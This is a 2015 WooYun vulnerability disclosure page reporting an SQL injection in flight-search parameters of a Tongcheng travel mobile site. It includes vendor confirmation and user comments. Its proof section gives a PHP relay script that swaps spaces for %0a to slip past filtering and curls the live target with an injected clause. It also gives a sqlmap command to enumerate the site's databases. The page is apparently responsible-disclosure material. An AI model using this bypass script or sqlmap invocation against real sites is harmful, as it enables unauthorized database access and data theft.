当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117916

漏洞标题:同程旅游网某站绕过waf继续注入

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: 杀器王子

提交时间:2015-06-03 11:03

修复时间:2015-07-18 11:08

公开时间:2015-07-18 11:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-03: 厂商已经确认,细节仅向厂商公开
2015-06-13: 细节向核心白帽子及相关领域专家公开
2015-06-23: 细节向普通白帽子公开
2015-07-03: 细节向实习白帽子公开
2015-07-18: 细节向公众公开

简要描述:

同程旅游网某站绕过waf继续注入

详细说明:

http://m.ly.com:80/flightnew/?FlyOffTime=2015-06-03&xiaomiUserId=1&beginCity=%E4%B8%8A%E6%B5%B7&arrCity=%E5%8C%97%E4%BA%AC&arrivaltime=1&refid=1
begincity和arrcity都存在注入
然而你司waf进行了过滤
但这并没什么卵用
于是可以轻松绕过出数据
我们看 直接curl这个地址 会301跳转

Snip20150603_5.png


触发waf的语句会跳到404

Snip20150603_6.png

漏洞证明:

下面是我的中专脚本

<?php
$sql = $_GET[sql];
$sql = str_replace(" ", "%0a", $sql);
$sql = str_replace("%20", "%0a", $sql);
$sql = str_replace("+", "%2b", $sql);
$cmd = 'curl "http://m.ly.com:80/flightnew/?FlyOffTime=2015-06-03&xiaomiUserId=1&beginCity=%E4%B8%8A%E6%B5%B7\'%0aand%0a1='.$sql.'--+&arrCity=%E5%8C%97%E4%BA%AC&arrivaltime=1&refid=1"';
system($cmd);
?>


直接用%0a代替空格
于是可以注入了

Snip20150603_7.png


python sqlmap.py --url "http://localhost/ly.php?sql=1" --dbms=mssql --technique=U --union-cols=17 --union-char=121234 --threads=10 --dbs


Snip20150603_8.png

修复方案:

进行更为严格的过滤

版权声明:转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-06-03 11:06

厂商回复:

感谢关注同程旅游,这个站没有waf的。
杀器王子就是屌~

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-03 11:03 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    屌屌屌

  2. 2015-06-03 11:07 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    3分钟确认! 中国好厂商

  3. 2015-06-03 11:08 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    额。

  4. 2015-06-03 11:09 | 杀器王子 认证白帽子 ( 普通白帽子 | Rank:1532 漏洞数:121 | 磨刀霍霍向猪羊)

    @苏州同程旅游网络科技有限公司 然而不绕确实是不行的 绕了以后才能注入

  5. 2015-06-03 11:10 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    还是没坚持到一个月,继续加油

  6. 2015-06-03 11:12 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)

    @@,我也得找一个吖

  7. 2015-06-03 11:18 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    3分钟确认我去这同城,恩机智啊

  8. 2015-06-03 11:27 | 糖剩七颗 ( 普通白帽子 | Rank:430 漏洞数:61 | 天涯何处无屌丝)

    看同程的注入漏洞就是学绕过waf的课程

  9. 2015-06-03 11:27 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    我猜是代码里面加了过滤语句

  10. 2015-06-03 11:29 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    肯定又是同城的软waf帮了杀气一把

  11. 2015-06-03 11:30 | 糖剩七颗 ( 普通白帽子 | Rank:430 漏洞数:61 | 天涯何处无屌丝)

    @苏州同程旅游网络科技有限公司求快点公开,让我们学习学习

  12. 2015-06-03 11:33 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    @管管侠 旅游业走起

  13. 2015-06-03 11:33 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @sql小神 软waf主要是go.ly.com www.17u.com 接入了,欢迎来测。

  14. 2015-06-03 15:21 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    估计是代码里面做的过滤

  15. 2015-06-03 16:10 | 無名老人 ( 路人 | Rank:15 漏洞数:3 | 干过开发,日过渗透,江湖人称: 少女杀手)

    感谢关注同程旅游,这个站没有waf的。杀器王子就是屌~

  16. 2015-06-04 08:21 | 人丑嘴不甜 ( 路人 | Rank:28 漏洞数:8 | 小菜鸟 妄想成为大大的大牛)

    感谢关注同程旅游,这个站没有waf的。杀器王子就是屌~

  17. 2015-06-09 19:04 | 杀器王子 认证白帽子 ( 普通白帽子 | Rank:1532 漏洞数:121 | 磨刀霍霍向猪羊)

    卡收到

  18. 2015-08-03 19:30 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    有杀气门,真任性